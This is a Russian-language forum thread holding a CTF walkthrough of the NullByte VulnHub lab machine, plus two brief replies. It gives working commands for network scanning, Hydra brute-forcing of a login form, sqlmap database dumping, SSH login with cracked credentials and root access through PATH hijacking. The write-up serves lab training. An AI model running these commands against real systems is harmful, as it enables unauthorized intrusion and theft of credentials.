ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Задания/Квесты/CTF/Конкурсы (https://forum.antichat.xyz/forumdisplay.php?f=112)
-   -   CTF. Взлом NullByte VM. (https://forum.antichat.xyz/showthread.php?t=1618527)

Vander 28.11.2016 20:08

Всем привет! В этой статье я опишу взлом уязвимой машины в рамках соревнований CTF.

Называется она NullByte VM (CTF Challenge)Для начала скачаем образ виртуальной машины отсюда => https://www.vulnhub.com/entry/nullbyte-1,126/. Затем импортируем его, например, в VMware.

https://forum.antichat.xyz/attachmen...638f400fa8.png

В качестве атакуемой машины, мной будет использоваться Kali Linux 2016.1 Rolling.

Начнем как обычно со сканирования своей сети, дабы обнаружить NullByte.

> arp-scan 192.168.0.1/16

https://forum.antichat.xyz/attachmen...fb0a239053.png


В моем случае целевой хост имеет адрес192.168.0.109.

Так же по традиции, запустим nmap в режиме агрессивного сканирования.


> nmap –A 192.168.0.109


https://forum.antichat.xyz/attachmen...1458f29c8e.png

Видим информацию о трех открытых портах, если с 777 и 80 все предельно ясно, а вот назначение 111 мне пока не ясно, возможно вернемся к нему позже.

Пока попробуем посмотреть, что же находится на 80 порту, зайдем на сервер по адресу 192.169.0.109:80.

https://forum.antichat.xyz/attachmen...08dd89889e.png

Замечательная картинка и все… Пока ничего не ясно. Есть вариант посмотреть метаданные, так как они точно есть, это видно в исходном коде элемента. Перепробовав несколько онлайн сервисов, результата я не получил, виной тому формат .gif. Изрядно погуглив, я вышел на утилитку exiftool, которую можно установить в Kali Linux.

> apt-get install exiftool

https://forum.antichat.xyz/attachmen...d527eeec7d.png

Теперь можем просмотреть метаданные.


> exiftool main.gif


https://forum.antichat.xyz/attachmen...47387cbce0.png

Строка Comment содержит явную подказку, сразу скажу – это директория, до этого я много пытался с ней сделать. Зайдем на сервер по адресу:

> 192.168.0.109/kzMb5nVYjw

https://forum.antichat.xyz/attachmen...3b8d6db5cb.png

Ключа у нас нет, но есть Hydra, ей и воспользуемся. Будем брутить эту форму входа. Для этого в терминале вводим следующую команду:

> hydra 192.168.56.109 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l x -P /usr/share/dict/words -t 10 -w 30

https://forum.antichat.xyz/attachmen...3ba5c5e17f.png

Дожидаемся окончания работы Гидры и получаем искомый пароль – elite. Используем его для входа на страницу.

https://forum.antichat.xyz/attachmen...b903b6d967.png

Теперь у нас спрашивают имя пользователя, так как никакой информацией мы не располагаем, попробуем подключить к работе sqlmap.

> sqlmap –uhttp://192.168.0.109/kzMb5nVYJw/420search.php?usrtosearch=1–dbs

https://forum.antichat.xyz/attachmen...934e119dde.png

Выполнение этого действия дало нам информацию о 5 найденных базах.

https://forum.antichat.xyz/attachmen...da990f7693.png

Нас же интересует – seth. Попробуем выжать больше информации следующей командой:

> sqlmap –uhttp://192.168.0.109/kzMb5nVYJw/420search.php?usrtosearch=1–dump –columns –tables –D seth

https://forum.antichat.xyz/attachmen...090299479f.png

Теперь у нас есть имя пользователя и хэш пароля.

https://forum.antichat.xyz/attachmen...c7c4e0519a.png

Хэш отнесем на любой понравившийся вам онлайн расшифровщик. Но перед этим приведем его в вид base64.

> echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 –d

https://forum.antichat.xyz/attachmen...277bdc930d.png

Теперь у нас на руках есть учетные данные одного пользователя.

https://forum.antichat.xyz/attachmen...7d31226bf6.png

Пароль – omega, логин – ramses. Попробуем эту связку при попытке доступа по SSH.

> sshramses@192.168.0.109–p 777

В результате получаем открытую сессию SSH.

https://forum.antichat.xyz/attachmen...fa92d47db4.png

По итогам осмотра содержимого, интересным показался файл procwatch, находящийся в каталоге /var/www/backup. Запустив его, мы видим, что он вызывает список процессов.

https://forum.antichat.xyz/attachmen...7f7f366d94.png

Если нам удастся изменить путь файла для ps на sh, то мы сможем добраться до корневого каталога. Для выполнения этой задачи вводим следующие команды:

> cd /tmp

> cp /bin/sh /tmp/ps

> export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

> cd /var/www/backup

> ./procwatch

> whoami

https://forum.antichat.xyz/attachmen...60103bc91b.png

Цель достигнута, мы root, далее выполняем:

> cd /root

> ls –a

> cat proof.txt

https://forum.antichat.xyz/attachmen...e812caf1f5.png

На этом прохождение Null Byte можно считать законченным. Спасибо за внимание.

DOOmsdAi 07.01.2018 23:12

можно было просто воспользоваться ImageMagic который предустановлен в кали и parrot, нежели скачивать exiftool. и кстати можно ли пробрутить http://192.168.0.109/phpmyadmin/ ? если да то чем?

Ondrik8 07.01.2018 23:38

Цитата:


DOOmsdAi сказал(а):

можно было просто воспользоваться ImageMagic который предустановлен в кали и parrot, нежели скачивать exiftool. и кстати можно ли пробрутить http://192.168.0.109/phpmyadmin/ ? если да то чем?


бурпом) burp-suite


Время: 17:11